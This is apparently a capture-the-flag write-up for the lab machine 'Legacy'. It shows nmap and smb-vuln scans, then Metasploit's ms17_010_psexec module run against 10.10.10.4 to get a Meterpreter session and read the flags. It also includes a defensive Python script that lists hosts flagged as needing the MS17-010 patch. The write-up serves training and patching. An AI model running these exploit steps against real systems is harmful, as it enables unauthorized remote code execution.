Legacy

Initial Enumeration

Like any other target, we'll start off with a quick port scan to see what we're working with:
```bash
nmap -sV 10.10.10.4
```
[Image: Initial Nmap Scan]
Looking at this output it's safe to say SMB is the target here. Let's take a closer look at this service using some NSE scripts:
```bash
nmap -p 139,445 --script=smb-vuln* 10.10.10.4
```
[Image: SMB Vulnerability Scan]
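From the defender's side, the same smb-vuln output is what tells you which hosts still need the MS17-010 patch. The Python below is an added example, not part of the original write-up: it parses nmap's XML output (the -oX format) and lists hosts whose smb-vuln-* checks came back vulnerable. The embedded XML is a constructed sample that imitates nmap's structure, not a real scan.

```python
import xml.etree.ElementTree as ET

# Constructed sample imitating nmap -oX output for two hosts (not a real scan).
SAMPLE_XML = """<nmaprun>
  <host><address addr="10.10.10.4" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
        <table key="MS17-010"><elem key="state">VULNERABLE</elem></table>
      </script>
      <script id="smb-vuln-ms08-067" output="NOT VULNERABLE"/>
    </hostscript>
  </host>
  <host><address addr="10.10.10.5" addrtype="ipv4"/>
    <hostscript><script id="smb-vuln-ms17-010" output="NOT VULNERABLE"/></hostscript>
  </host>
</nmaprun>"""


def _script_is_vulnerable(script):
    """True if the NSE vulns library reported this check as (likely) vulnerable."""
    states = [e.text or "" for e in script.iter("elem") if e.get("key") == "state"]
    if not states:  # terse output with no state table: fall back to the output text
        states = [script.get("output", "")]
    return any(s.strip().upper().startswith(("VULNERABLE", "LIKELY VULNERABLE"))
               for s in states)


def vulnerable_hosts(xml_text):
    """Map each IPv4 address to the smb-vuln-* script ids that flagged it."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.iter("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        hits = [s.get("id") for s in host.iter("script")
                if s.get("id", "").startswith("smb-vuln") and _script_is_vulnerable(s)]
        if hits:
            findings[addr] = hits
    return findings


if __name__ == "__main__":
    for ip, scripts in vulnerable_hosts(SAMPLE_XML).items():
        print(f"{ip}: patch or isolate, flagged by {', '.join(scripts)}")
```

Run it against a real `nmap -oX scan.xml --script=smb-vuln*` file by reading the file into `vulnerable_hosts`; hosts listed are the ones to patch or isolate first.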
Bingo, now we just have to find an exploit. In the interest of time, we'll use Metasploit to exploit this vulnerability. I originally intended to show how to do this manually, but due to the older version of Windows this box is running, I ran into a lot of issues. For a non-Metasploit look at MS17-010, be sure to take a look at my write-up on Blue. The first thing we'll do is start msfconsole and validate that this exploit will work on this target:
```bash
# starting msfconsole
msfconsole

# the following happens inside the console:
use exploit/windows/smb/ms17_010_psexec
set RHOST 10.10.10.4
check
```
[Image: MSF Exploit Validation]

Exploitation

Exploitation from here on is pretty simple. So simple, in fact, that it just takes typing one word: exploit. While I prefer not to use Metasploit for learning purposes, I can't deny how convenient it makes common exploits like this:
[Image: Executing the exploit]
From the resulting Meterpreter session we can either grab the flags using Meterpreter commands or spawn a shell with the shell command. Either way, we are able to read the flags:
[Image: Flags]